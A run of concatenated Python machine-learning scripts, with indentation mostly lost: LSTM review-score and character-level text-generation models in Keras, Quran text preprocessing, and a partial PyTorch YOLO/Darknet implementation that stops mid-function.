model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(1, activation='sigmoid'))
model.summary()
return model
def get_model_5stars(vocab_size, sequence_length, embedding_size, verbose=0):
model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(1, activation="linear"))
if verbose:
model.summary()
return model
import numpy as np
import pandas as pd
import tqdm
import pickle
from collections import Counter
from sklearn.model_selection import train_test_split
from utils import clean_text, tokenize_words
from config import N, test_size
def load_review_data():
# df = pd.read_csv("data/Reviews.csv")
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
# preview
print(df.head())
print(df.tail())
vocab = []
# X = np.zeros((len(df)*2, 2), dtype=object)
X = np.zeros((len(df), 2), dtype=object)
# for i in tqdm.tqdm(range(len(df)), "Cleaning X1"):
# target = df['Text'].loc[i]
# score = df['Score'].loc[i]
# X[i, 0] = clean_text(target)
# X[i, 1] = score
# for word in X[i, 0].split():
# vocab.append(word)
# k = i+1
k = 0
for i in tqdm.tqdm(range(len(df)), "Cleaning X2"):
target = df['Summary'].loc[i]
score = df['Score'].loc[i]
X[i+k, 0] = clean_text(target)
X[i+k, 1] = score
for word in X[i+k, 0].split():
vocab.append(word)
# vocab = set(vocab)
vocab = Counter(vocab)
# delete words that occur less than 10 times
vocab = { k:v for k, v in vocab.items() if v >= N }
# word to integer encoder dict
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# pickle vocab2int for testing
print("Pickling vocab2int...")
pickle.dump(vocab2int, open("data/vocab2int.pickle", "wb"))
# encoded reviews
for i in tqdm.tqdm(range(X.shape[0]), "Tokenizing words"):
X[i, 0] = tokenize_words(str(X[i, 0]), vocab2int)
lengths = [ len(row) for row in X[:, 0] ]
print("min_length:", min(lengths))
print("max_length:", max(lengths))
X_train, X_test, y_train, y_test = train_test_split(X[:, 0], X[:, 1], test_size=test_size, shuffle=True, random_state=19)
return X_train, X_test, y_train, y_test, vocab
import os
# disable keras logging messages
import sys
stderr = sys.stderr
sys.stderr = open(os.devnull, 'w')
import keras
sys.stderr = stderr
# to use CPU
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from model import get_model_5stars
from utils import clean_text, tokenize_words
from config import embedding_size, sequence_length
from keras.preprocessing.sequence import pad_sequences
import pickle
vocab2int = pickle.load(open("data/vocab2int.pickle", "rb"))
model = get_model_5stars(len(vocab2int), sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V20_0.38_0.80.h5")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Food Review evaluator")
parser.add_argument("review", type=str, help="The review of the product in text")
args = parser.parse_args()
review = tokenize_words(clean_text(args.review), vocab2int)
x = pad_sequences([review], maxlen=sequence_length)
print(f"{model.predict(x)[0][0]:.2f}/5")
# to use CPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import os
import numpy as np
import pandas as pd
from keras.callbacks import ModelCheckpoint
from keras.preprocessing import sequence
from preprocess import load_review_data
from model import get_model_5stars
from config import sequence_length, embedding_size, batch_size, epochs
X_train, X_test, y_train, y_test, vocab = load_review_data()
vocab_size = len(vocab)
print("Vocab size:", vocab_size)
X_train = sequence.pad_sequences(X_train, maxlen=sequence_length)
X_test = sequence.pad_sequences(X_test, maxlen=sequence_length)
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape)
model = get_model_5stars(vocab_size, sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V40_0.60_0.67.h5")
model.compile(loss="mse", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/model_V40_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=True, verbose=1)
model.fit(X_train, y_train, epochs=epochs,
validation_data=(X_test, y_test),
batch_size=batch_size,
callbacks=[checkpointer])
import numpy as np
from string import punctuation
# make it a set to speed up membership tests
punc = set(punctuation)
def clean_text(text):
return ''.join([ c.lower() for c in str(text) if c not in punc ])
def tokenize_words(words, vocab2int):
words = words.split()
tokenized_words = np.zeros((len(words),))
for j in range(len(words)):
try:
tokenized_words[j] = vocab2int[words[j]]
except KeyError:
# no <unk> token is used; out-of-vocabulary words are simply skipped (left as 0)
pass
return tokenized_words
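# Tiny illustrative example of the helpers above (assumed toy vocabulary, not the real one):
def _text_utils_demo():
    vocab2int = {"good": 1, "food": 2}
    cleaned = clean_text("Good food!!")            # -> "good food"
    tokens = tokenize_words(cleaned, vocab2int)    # -> array([1., 2.])
    return cleaned, tokens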
import numpy as np
import pickle
import tqdm
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, Activation
from keras.callbacks import ModelCheckpoint
seed = "import os"
# output:
# ded of and alice as it go on and the court
# well you wont you wouldncopy thing
# there was not a long to growing anxiously any only a low every cant
# go on a litter which was proves of any only here and the things and the mort meding and the mort and alice was the things said to herself i cant remeran as if i can repeat eften to alice any of great offf its archive of and alice and a cancur as the mo
char2int = pickle.load(open("python-char2int.pickle", "rb"))
int2char = pickle.load(open("python-int2char.pickle", "rb"))
sequence_length = 100
n_unique_chars = len(char2int)
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
# generate 400 characters
generated = ""
for i in tqdm.tqdm(range(400), "Generating text"):
# make the input sequence
X = np.zeros((1, sequence_length, n_unique_chars))
for t, char in enumerate(seed):
X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1
# predict the next character
predicted = model.predict(X, verbose=0)[0]
# converting the vector to an integer
next_index = np.argmax(predicted)
# converting the integer to a character
next_char = int2char[next_index]
# add the character to results
generated += next_char
# shift seed and the predicted character
seed = seed[1:] + next_char
print("Generated text:")
print(generated)
import numpy as np
import os
import pickle
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout
from keras.callbacks import ModelCheckpoint
from utils import get_batches
# import requests
# content = requests.get("http://www.gutenberg.org/cache/epub/11/pg11.txt").text
# open("data/wonderland.txt", "w", encoding="utf-8").write(content)
from string import punctuation
# read the data
# text = open("data/wonderland.txt", encoding="utf-8").read()
text = open("E:\\datasets\\text\\my_python_code.py").read()
# remove caps
text = text.lower()
for c in "!":
text = text.replace(c, "")
# text = text.lower().replace("\n\n", "\n").replace("", "").replace("", "").replace("", "").replace("", "")
# text = text.translate(str.maketrans("", "", punctuation))
# text = text[:100_000]
n_chars = len(text)
unique_chars = ''.join(sorted(set(text)))
print("unique_chars:", unique_chars)
n_unique_chars = len(unique_chars)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(unique_chars)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(unique_chars)}
# save these dictionaries for later generation
pickle.dump(char2int, open("python-char2int.pickle", "wb"))
pickle.dump(int2char, open("python-int2char.pickle", "wb"))
# hyper parameters
sequence_length = 100
step = 1
batch_size = 128
epochs = 1
sentences = []
y_train = []
for i in range(0, len(text) - sequence_length, step):
sentences.append(text[i: i + sequence_length])
y_train.append(text[i+sequence_length])
print("Number of sentences:", len(sentences))
X = get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps=step)
# for i, x in enumerate(X):
# if i == 1:
# break
# print(x[0].shape, x[1].shape)
# # vectorization
# X = np.zeros((len(sentences), sequence_length, n_unique_chars))
# y = np.zeros((len(sentences), n_unique_chars))
# for i, sentence in enumerate(sentences):
# for t, char in enumerate(sentence):
# X[i, t, char2int[char]] = 1
# y[i, char2int[y_train[i]]] = 1
# X = np.array([char2int[c] for c in text])
# print("X.shape:", X.shape)
# goal of X is (n_samples, sequence_length, n_chars)
# sentences = np.zeros(())
# print("y.shape:", y.shape)
# building the model
# model = Sequential([
# LSTM(128, input_shape=(sequence_length, n_unique_chars)),
# Dense(n_unique_chars, activation="softmax"),
# ])
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
model.summary()
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpoint = ModelCheckpoint("results/python-v2-{loss:.2f}.h5", verbose=1)
# model.fit(X, y, batch_size=batch_size, epochs=epochs, callbacks=[checkpoint])
model.fit_generator(X, steps_per_epoch=len(sentences) // batch_size, epochs=epochs, callbacks=[checkpoint])
import numpy as np
def get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps):
chars_per_batch = batch_size * n_steps
n_batches = len(sentences) // chars_per_batch
while True:
for i in range(0, len(sentences), batch_size):
X = np.zeros((batch_size, sequence_length, n_unique_chars))
y = np.zeros((batch_size, n_unique_chars))
for j, sentence in enumerate(sentences[i: i+batch_size]):
    for t, char in enumerate(sentence):
        X[j, t, char2int[char]] = 1
    y[j, char2int[y_train[i + j]]] = 1
yield X, y
from pyarabic.araby import ALPHABETIC_ORDER
with open("quran.txt", encoding="utf8") as f:
text = f.read()
unique_chars = set(text)
print("unique chars:", unique_chars)
arabic_alpha = { c for c, order in ALPHABETIC_ORDER.items() }
to_be_removed = unique_chars - arabic_alpha
to_be_removed = to_be_removed - {'.', ' ', ''}
print(to_be_removed)
text = text.replace("", ".")
for char in to_be_removed:
text = text.replace(char, "")
text = text.replace(" ", " ")
text = text.replace(" \n", "")
text = text.replace("\n ", "")
with open("quran_cleaned.txt", "w", encoding="utf8") as f:
print(text, file=f)
from sklearn.model_selection import GridSearchCV
from keras.wrappers.scikit_learn import KerasClassifier
from utils import read_data, text_to_sequence, get_batches, get_data
from models import rnn_model
from keras.layers import LSTM
import numpy as np
text, int2char, char2int = read_data()
batch_size = 256
test_size = 0.2
n_steps = 200
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
X, Y = get_data(X_train, batch_size, n_steps, vocab_size=vocab_size+1)
print(X.shape)
print(Y.shape)
# cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True
model = KerasClassifier(build_fn=rnn_model, input_dim=n_steps, cell=LSTM, num_layers=2, dropout=0.2, output_dim=vocab_size+1,
batch_normalization=True, bidirectional=True)
params = {
"units": [100, 128, 200, 256, 300]
}
grid = GridSearchCV(estimator=model, param_grid=params)
grid_result = grid.fit(X, Y)
print(grid_result.best_estimator_)
print(grid_result.best_params_)
print(grid_result.best_score_)
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed, Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True):
model = Sequential()
for i in range(num_layers):
if i == 0:
# first time, specify input_shape
# if bidirectional:
# model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
# else:
model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
else:
if i == num_layers - 1:
return_sequences = False
else:
return_sequences = True
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=return_sequences)))
else:
model.add(cell(units, return_sequences=return_sequences))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(output_dim, activation="softmax"))
model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
return model
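# Hypothetical usage sketch (all hyperparameter values below are assumptions made for
# illustration; they are not taken from the training scripts above):
def _rnn_model_demo():
    return rnn_model(input_dim=100, cell=LSTM, num_layers=2, units=128,
                     dropout=0.2, output_dim=99, batch_normalization=True,
                     bidirectional=False)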
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import rnn_model
from keras.layers import LSTM
from utils import sequence_to_text, get_data
import numpy as np
import pickle
char2int = pickle.load(open("results/char2int.pickle", "rb"))
int2char = { v:k for k, v in char2int.items() }
print(int2char)
n_steps = 500
def text_to_sequence(text):
global char2int
return [ char2int[c] for c in text ]
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
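# Illustrative call (assumed probabilities): only the top_n highest-probability indices
# stay eligible, then one of them is drawn at random in proportion to its probability.
def _pick_top_n_demo():
    preds = np.array([[0.05, 0.1, 0.5, 0.3, 0.05]])
    return pick_top_n(preds, vocab_size=5, top_n=2)  # returns 2 or 3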
def logits_to_text(logits):
"""
Turn the logits from the network into a single character using the int2char mapping
:param logits: logit/probability vector from the network
:return: the character with the highest score
"""
return int2char[np.argmax(logits, axis=0)]
# return ''.join([int2char[prediction] for prediction in np.argmax(logits, 1)])
def generate_code(model, initial_text, n_chars=100):
new_chars = ""
for i in range(n_chars):
x = np.array(text_to_sequence(initial_text))
x, _ = get_data(x, 64, n_steps, 1)
pred = model.predict(x)[0][0]
c = logits_to_text(pred)
new_chars += c
initial_text += c
return new_chars
model = rnn_model(input_dim=n_steps, output_dim=99, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
model.load_weights("results/rnn_3.5")
x = """x = np.array(text_to_sequence(x))
x, _ = get_data(x, n_steps, 1)
print(x.shape)
print(x.shape)
print(model.predict_proba(x))
print(model.predict_classes(x))
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_chars.char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, len(train_chars.vocab))
samples.append(train_chars.int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
if i == n_samples - 1 and char != " ":
# while char != "." and char != " ":
while char != " ":
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(cha
"""
# print(x.shape)
# print(x.shape)
# pred = model.predict(x)[0][0]
# print(pred)
# print(logits_to_text(pred))
# print(model.predict_classes(x))
print(generate_code(model, x, n_chars=500))
from models import rnn_model
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from utils import text_to_sequence, sequence_to_text, get_batches, read_data, get_data, get_data_length
import numpy as np
import os
text, int2char, char2int = read_data(load=False)
batch_size = 256
test_size = 0.2
n_steps = 500
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
train = get_batches(X_train, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
test = get_batches(X_test, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
for i, t in enumerate(train):
if i == 2:
break
print(t[0])
print(np.array(t[0]).shape)
# print(test.shape)
# # DIM = 28
# model = rnn_model(input_dim=n_steps, output_dim=vocab_size+1, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
# model.summary()
# model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
# if not os.path.isdir("results"):
# os.mkdir("results")
# checkpointer = ModelCheckpoint("results/rnn_{val_loss:.1f}", save_best_only=True, verbose=1)
# train_steps_per_epoch = get_data_length(X_train, n_steps, output_format="one") // batch_size
# test_steps_per_epoch = get_data_length(X_test, n_steps, output_format="one") // batch_size
# print("train_steps_per_epoch:", train_steps_per_epoch)
# print("test_steps_per_epoch:", test_steps_per_epoch)
# model.load_weights("results/rnn_3.2")
# model.fit_generator(train,
# epochs=30,
# validation_data=(test),
# steps_per_epoch=train_steps_per_epoch,
# validation_steps=test_steps_per_epoch,
# callbacks=[checkpointer],
# verbose=1)
# model.save("results/rnn_final.model")
import numpy as np
import tqdm
import pickle
from keras.utils import to_categorical
int2char, char2int = None, None
def read_data(load=False):
global int2char
global char2int
with open("E:\\datasets\\text\\my_python_code.py") as f:
text = f.read()
unique_chars = set(text)
if not load:
int2char = { i: c for i, c in enumerate(unique_chars, start=1) }
char2int = { c: i for i, c in enumerate(unique_chars, start=1) }
pickle.dump(int2char, open("results/int2char.pickle", "wb"))
pickle.dump(char2int, open("results/char2int.pickle", "wb"))
else:
int2char = pickle.load(open("results/int2char.pickle", "rb"))
char2int = pickle.load(open("results/char2int.pickle", "rb"))
return text, int2char, char2int
def get_batches(arr, batch_size, n_steps, vocab_size, output_format="many"):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
if output_format == "many":
while True:
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
elif output_format == "one":
while True:
# X = np.zeros((arr.shape[1], n_steps))
# y = np.zeros((arr.shape[1], 1))
# for i in range(n_samples-n_steps):
# X[i] = np.array([ p.replace(",", "") if isinstance(p, str) else p for p in df.Price.iloc[i: i+n_steps] ])
# price = df.Price.iloc[i + n_steps]
# y[i] = price.replace(",", "") if isinstance(price, str) else price
for n in range(arr.shape[1] - n_steps-1):
x = arr[:, n: n+n_steps]
y = arr[:, n+n_steps+1]
# print("y.shape:", y.shape)
y = to_categorical(y, num_classes=vocab_size)
# print("y.shape after categorical:", y.shape)
y = np.expand_dims(y, axis=0)
yield x.reshape(1, x.shape[0], x.shape[1]), y
def get_data(arr, batch_size, n_steps, vocab_size):
# n_samples = len(arr) // n_seq
# X = np.zeros((n_seq, n_samples))
# Y = np.zeros((n_seq, n_samples))
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
# for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
# x = arr[i:i+n_seq]
# y = arr[i+1:i+n_seq+1]
# if len(x) != n_seq or len(y) != n_seq:
# break
# X[:, index] = x
# Y[:, index] = y
X = np.zeros((batch_size, arr.shape[1]))
Y = np.zeros((batch_size, vocab_size))
for n in range(arr.shape[1] - n_steps-1):
x = arr[:, n: n+n_steps]
y = arr[:, n+n_steps+1]
# print("y.shape:", y.shape)
y = to_categorical(y, num_classes=vocab_size)
# print("y.shape after categorical:", y.shape)
# y = np.expand_dims(y, axis=1)
X[:, n: n+n_steps] = x
Y[n] = y
# yield x.reshape(1, x.shape[0], x.shape[1]), y
return np.expand_dims(X, axis=1), Y
# return n_samples
# return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_data_length(arr, n_seq, output_format="many"):
if output_format == "many":
return len(arr) // n_seq
elif output_format == "one":
return len(arr) - n_seq
def text_to_sequence(text):
global char2int
return [ char2int[c] for c in text ]
def sequence_to_text(sequence):
global int2char
return ''.join([ int2char[i] for i in sequence ])
import json
import os
import glob
CUR_DIR = os.getcwd()
text = ""
# for filename in os.listdir(os.path.join(CUR_DIR, "data", "json")):
surat = [ f"surah_{i}.json" for i in range(1, 115) ]
for filename in surat:
filename = os.path.join(CUR_DIR, "data", "json", filename)
file = json.load(open(filename, encoding="utf8"))
content = file['verse']
for verse_id, ayah in content.items():
text += f"{ayah}."
n_ayah = len(text.split("."))
n_words = len(text.split(" "))
n_chars = len(text)
print(f"Number of ayat: {n_ayah}, Number of words: {n_words}, Number of chars: {n_chars}")
with open("quran.txt", "w", encoding="utf8") as quran_file:
print(text, file=quran_file)
import torch
import torch.nn as nn
import numpy as np
# let us run this cell only if CUDA is available
# We will use torch.device objects to move tensors in and out of GPU
if torch.cuda.is_available():
x = torch.randn(1)
device = torch.device("cuda") # a CUDA device object
y = torch.ones_like(x, device=device) # directly create a tensor on GPU
x = x.to(device) # or just use strings .to("cuda")
z = x + y
print(z)
print(z.to("cpu", torch.double)) # .to can also change dtype together!
class YoloLayer(nn.Module):
def __init__(self, anchor_mask=[], num_classes=0, anchors=[], num_anchors=1):
super(YoloLayer, self).__init__()
self.anchor_mask = anchor_mask
self.num_classes = num_classes
self.anchors = anchors
self.num_anchors = num_anchors
self.anchor_step = len(anchors)/num_anchors
self.coord_scale = 1
self.noobject_scale = 1
self.object_scale = 5
self.class_scale = 1
self.thresh = 0.6
self.stride = 32
self.seen = 0
def forward(self, output, nms_thresh):
self.thresh = nms_thresh
masked_anchors = []
for m in self.anchor_mask:
masked_anchors += self.anchors[m*self.anchor_step:(m+1)*self.anchor_step]
masked_anchors = [anchor/self.stride for anchor in masked_anchors]
boxes = get_region_boxes(output.data, self.thresh, self.num_classes, masked_anchors, len(self.anchor_mask))
return boxes
class Upsample(nn.Module):
def __init__(self, stride=2):
super(Upsample, self).__init__()
self.stride = stride
def forward(self, x):
stride = self.stride
assert(x.data.dim() == 4)
B = x.data.size(0)
C = x.data.size(1)
H = x.data.size(2)
W = x.data.size(3)
ws = stride
hs = stride
x = x.view(B, C, H, 1, W, 1).expand(B, C, H, stride, W, stride).contiguous().view(B, C, H*stride, W*stride)
return x
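# Quick illustrative check (an added sketch, not part of the network definition): the
# view/expand trick above is a nearest-neighbour upsample, so an input of shape
# (B, C, H, W) comes out with shape (B, C, H*stride, W*stride).
def _upsample_demo():
    up = Upsample(stride=2)
    x = torch.arange(4.0).view(1, 1, 2, 2)
    return up(x)  # shape (1, 1, 4, 4)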
#for route and shortcut
class EmptyModule(nn.Module):
def __init__(self):
super(EmptyModule, self).__init__()
def forward(self, x):
return x
# support route shortcut
class Darknet(nn.Module):
def __init__(self, cfgfile):
super(Darknet, self).__init__()
self.blocks = parse_cfg(cfgfile)
self.models = self.create_network(self.blocks) # merge conv, bn,leaky
self.loss = self.models[len(self.models)-1]
self.width = int(self.blocks[0]['width'])
self.height = int(self.blocks[0]['height'])
self.header = torch.IntTensor([0,0,0,0])
self.seen = 0
def forward(self, x, nms_thresh):
ind = -2
self.loss = None
outputs = dict()
out_boxes = []
for block in self.blocks:
ind = ind + 1
if block['type'] == 'net':
continue
elif block['type'] in ['convolutional', 'upsample']:
x = self.models[ind](x)
outputs[ind] = x
elif block['type'] == 'route':
layers = block['layers'].split(',')
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
if len(layers) == 1:
x = outputs[layers[0]]
outputs[ind] = x
elif len(layers) == 2:
x1 = outputs[layers[0]]
x2 = outputs[layers[1]]
x = torch.cat((x1,x2),1)
outputs[ind] = x
elif block['type'] == 'shortcut':
from_layer = int(block['from'])
activation = block['activation']
from_layer = from_layer if from_layer > 0 else from_layer + ind
x1 = outputs[from_layer]
x2 = outputs[ind-1]
x = x1 + x2
outputs[ind] = x
elif block['type'] == 'yolo':
boxes = self.models[ind](x, nms_thresh)
out_boxes.append(boxes)
else:
print('unknown type %s' % (block['type']))
return out_boxes
def print_network(self):
print_cfg(self.blocks)
def create_network(self, blocks):
models = nn.ModuleList()
prev_filters = 3
out_filters =[]
prev_stride = 1
out_strides = []
conv_id = 0
for block in blocks:
if block['type'] == 'net':
prev_filters = int(block['channels'])
continue
elif block['type'] == 'convolutional':
conv_id = conv_id + 1
batch_normalize = int(block['batch_normalize'])
filters = int(block['filters'])
kernel_size = int(block['size'])
stride = int(block['stride'])
is_pad = int(block['pad'])
pad = (kernel_size-1)//2 if is_pad else 0
activation = block['activation']
model = nn.Sequential()
if batch_normalize:
model.add_module('conv{0}'.format(conv_id), nn.Conv2d(prev_filters, filters, kernel_size, stride, pad, bias=False))
model.add_module('bn{0}'.format(conv_id), nn.BatchNorm2d(filters))
else:
model.add_module('conv{0}'.format(conv_id), nn.Conv2d(prev_filters, filters, kernel_size, stride, pad))
if activation == 'leaky':
model.add_module('leaky{0}'.format(conv_id), nn.LeakyReLU(0.1, inplace=True))
prev_filters = filters
out_filters.append(prev_filters)
prev_stride = stride * prev_stride
out_strides.append(prev_stride)
models.append(model)
elif block['type'] == 'upsample':
stride = int(block['stride'])
out_filters.append(prev_filters)
prev_stride = prev_stride // stride
out_strides.append(prev_stride)
models.append(Upsample(stride))
elif block['type'] == 'route':
layers = block['layers'].split(',')
ind = len(models)
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
if len(layers) == 1:
prev_filters = out_filters[layers[0]]
prev_stride = out_strides[layers[0]]
elif len(layers) == 2:
assert(layers[0] == ind - 1)
prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
prev_stride = out_strides[layers[0]]
out_filters.append(prev_filters)
out_strides.append(prev_stride)
models.append(EmptyModule())
elif block['type'] == 'shortcut':
ind = len(models)
prev_filters = out_filters[ind-1]
out_filters.append(prev_filters)
prev_stride = out_strides[ind-1]
out_strides.append(prev_stride)
models.append(EmptyModule())
elif block['type'] == 'yolo':
yolo_layer = YoloLayer()
anchors = block['anchors'].split(',')
anchor_mask = block['mask'].split(',')
yolo_layer.anchor_mask = [int(i) for i in anchor_mask]
yolo_layer.anchors = [float(i) for i in anchors]
yolo_layer.num_classes = int(block['classes'])
yolo_layer.num_anchors = int(block['num'])
yolo_layer.anchor_step = len(yolo_layer.anchors)//yolo_layer.num_anchors
yolo_layer.stride = prev_stride
out_filters.append(prev_filters)
out_strides.append(prev_stride)
models.append(yolo_layer)
else:
print('unknown type %s' % (block['type']))
return models
def load_weights(self, weightfile):
print()
fp = open(weightfile, 'rb')
header = np.fromfile(fp, count=5, dtype=np.int32)
self.header = torch.from_numpy(header)
self.seen = self.header[3]
buf = np.fromfile(fp, dtype = np.float32)
fp.close()
start = 0
ind = -2
counter = 3
for block in self.blocks:
if start >= buf.size:
break
ind = ind + 1
if block['type'] == 'net':
continue
elif block['type'] == 'convolutional':
model = self.models[ind]
batch_normalize = int(block['batch_normalize'])
if batch_normalize:
start = load_conv_bn(buf, start, model[0], model[1])
else:
start = load_conv(buf, start, model[0])
elif block['type'] == 'upsample':
pass
elif block['type'] == 'route':
pass
elif block['type'] == 'shortcut':
pass
elif block['type'] == 'yolo':
pass
else:
print('unknown type %s' % (block['type']))
percent_comp = (counter / len(self.blocks)) * 100
print('Loading weights. Please Wait...{:.2f}% Complete'.format(percent_comp), end = '\r', flush = True)
counter += 1
def convert2cpu(gpu_matrix):
return torch.FloatTensor(gpu_matrix.size()).copy_(gpu_matrix)
def convert2cpu_long(gpu_matrix):
return torch.LongTensor(gpu_matrix.size()).copy_(gpu_matrix)
def get_region_boxes(output, conf_thresh, num_classes, anchors, num_anchors, only_objectness = 1, validation = False):
anchor_step = len(anchors)//num_anchors
if output.dim() == 3:
output = output.unsqueeze(0)
batch = output.size(0)
assert(output.size(1) == (5+num_classes)*num_anchors)
h = output.size(2)
w = output.size(3)
all_boxes = []
output = output.view(batch*num_anchors, 5+num_classes, h*w).transpose(0,1).contiguous().view(5+num_classes, batch*num_anchors*h*w)
grid_x = torch.linspace(0, w-1, w).repeat(h,1).repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).type_as(output) #cuda()
